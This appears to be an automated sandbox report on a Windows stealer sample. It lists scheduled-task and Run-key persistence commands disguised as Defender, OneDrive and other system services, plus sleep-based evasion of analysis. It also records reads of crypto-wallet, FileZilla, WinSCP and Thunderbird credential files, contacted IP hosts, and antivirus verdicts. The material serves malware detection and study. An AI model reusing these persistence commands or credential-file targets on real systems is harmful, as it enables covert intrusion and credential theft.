cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2480 CREDAT:145409 |
cmdline | "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2480 CREDAT:145410 |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk579" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk1481" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk7066" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk1481" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk406" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk7066" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2480 CREDAT:210945 |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
wmi | SELECT * FROM Win32_Processor |
buffer | Buffer with sha1: 8a4089a71223de0325f404aea31ab0e2f9a015e1 |
host | 103.89.90.61 | |||
host | 117.18.232.200 | |||
host | 176.113.115.146 | |||
host | 193.56.146.177 | |||
host | 195.54.170.157 | |||
host | 45.159.248.173 | |||
host | 62.204.41.144 |
description | dllhost.exe tried to sleep 5456445 seconds, actually delayed analysis time by 5456445 seconds | |||
description | MinecraftForge.exe tried to sleep 2728193 seconds, actually delayed analysis time by 2728193 seconds |
registry | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString |
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dllhost | reg_value | C:\ProgramData\Dllhost\dllhost.exe | ||||||
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\SecurityHealthSystray | reg_value | C:\Windows\System32\SecurityHealthSystray.exe | ||||||
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefender | reg_value | C:\Program Files\Windows Defender\MpCmdRun.exe | ||||||
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Cortana | reg_value | C:\Program Files\WindowsApps\Microsoft.x64__8wekyb3gfdfdgd8bbwe\Cortana.exe | ||||||
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE | reg_value | C:\Windows\System32\wbem\WmiPrvSE.exe | ||||||
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\AntiMalwareServiceExecutable | reg_value | C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2111.5-0\MsMpEng.exe | ||||||
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeUpd | reg_value | C:\Program Files\WindowsApps\Microsoft.x64__8wekyb3gfdfdgd8bbwe/file.exe | ||||||
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\OneDriveService | reg_value | C:\Program Files\WindowsApps\Microsoft.x64__8wekyb3gfdfdgd8bbwe/file.exe | ||||||
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\NvStray | reg_value | C:\Program Files\WindowsApps\Microsoft.x64__8wekyb3gfdfdgd8bbwe / file.exe | ||||||
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" | ||||||||
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" | ||||||||
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" | ||||||||
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk579" /TR "C:\ProgramData\Dllhost\dllhost.exe" | ||||||||
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk406" /TR "C:\ProgramData\Dllhost\dllhost.exe" | ||||||||
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" | ||||||||
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" | ||||||||
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" | ||||||||
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" | ||||||||
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" | ||||||||
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk579" /TR "C:\ProgramData\Dllhost\dllhost.exe" | ||||||||
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk1481" /TR "C:\ProgramData\Dllhost\dllhost.exe" | ||||||||
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" | ||||||||
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" | ||||||||
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" | ||||||||
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk7066" /TR "C:\ProgramData\Dllhost\dllhost.exe" | ||||||||
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk1481" /TR "C:\ProgramData\Dllhost\dllhost.exe" | ||||||||
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk406" /TR "C:\ProgramData\Dllhost\dllhost.exe" | ||||||||
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" | ||||||||
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" | ||||||||
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk7066" /TR "C:\ProgramData\Dllhost\dllhost.exe" | ||||||||
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" | ||||||||
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" | ||||||||
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
file | C:\Users\test22\AppData\Roaming\Electrum\wallets\ |
file | C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml |
file | C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml |
registry | HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration |
wmi | SELECT * FROM AntivirusProduct |
wmi | SELECT * FROM Win32_VideoController |
wmi | SELECT * FROM Win32_OperatingSystem |
wmi | SELECT * FROM Win32_Process Where SessionId='1' |
wmi | SELECT * FROM AntiSpyWareProduct |
wmi | SELECT * FROM FirewallProduct |
wmi | SELECT * FROM Win32_Processor |
file | C:\Users\test22\AppData\Roaming\Thunderbird\profiles.ini |
process | iexplore.exe | useragent | |||||||
process | iexplore.exe | useragent | Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) | ||||||
process | kukurzka9000.exe | useragent | mozzzzzzzzzzz |
dead_host | 62.204.41.144:14096 |
Bkav | W32.AIDetect.malware2 |
MicroWorld-eScan | Trojan.GenericKD.61246934 |
FireEye | Trojan.GenericKD.61246934 |
CAT-QuickHeal | TrojanSpy.Stealer |
ALYac | Gen:Variant.Graftor.540662 |
Cylance | Unsafe |
VIPRE | Trojan.GenericKD.61246934 |
K7AntiVirus | Riskware ( 0040eff71 ) |
K7GW | Riskware ( 0040eff71 ) |
Cybereason | malicious.9d71cc |
BitDefenderTheta | Gen:NN.ZelphiF.34592.yHW@aa4TxVaO |
Cyren | W32/Kryptik.HGY.gen!Eldorado |
Symantec | Trojan.Whispergate |
Elastic | malicious (high confidence) |
ESET-NOD32 | multiple detections |
Paloalto | generic.ml |
Kaspersky | UDS:DangerousObject.Multi.Generic |
BitDefender | Trojan.GenericKD.61246934 |
NANO-Antivirus | Trojan.Win32.Stealer.jrisng |
Cynet | Malicious (score: 99) |
SUPERAntiSpyware | Trojan.Agent/Gen-Dropper |
Avast | Win32:PWSX-gen [Trj] |
Emsisoft | Trojan.GenericKD.61246934 (B) |
DrWeb | Trojan.PWS.Steam.32011 |
SentinelOne | Static AI - Malicious PE |
Sophos | Generic ML PUA (PUA) |
APEX | Malicious |
Webroot | W32.Trojan.Gen |
Avira | TR/Crypt.Agent.mixwr |
MAX | malware (ai score=89) |
Antiy-AVL | Trojan/Generic.ASMalwS.8153 |
Kingsoft | Win32.Troj.Banker.(kcloud) |
Microsoft | Ransom:Win32/StopCrypt.SLK!MTB |
Gridinsoft | Trojan.Win32.CoinMiner.vb!s8 |
GData | Gen:Variant.Graftor.540662 |
Detected | |
VBA32 | BScope.Trojan.Wacatac |
Malwarebytes | Spyware.RedLineStealer |
Ikarus | Trojan.Win32.Crypt |
MaxSecure | Trojan-Ransom.Win32.Crypmod.zfq |
AVG | Win32:PWSX-gen [Trj] |
CrowdStrike | win/malicious_confidence_70% (W) |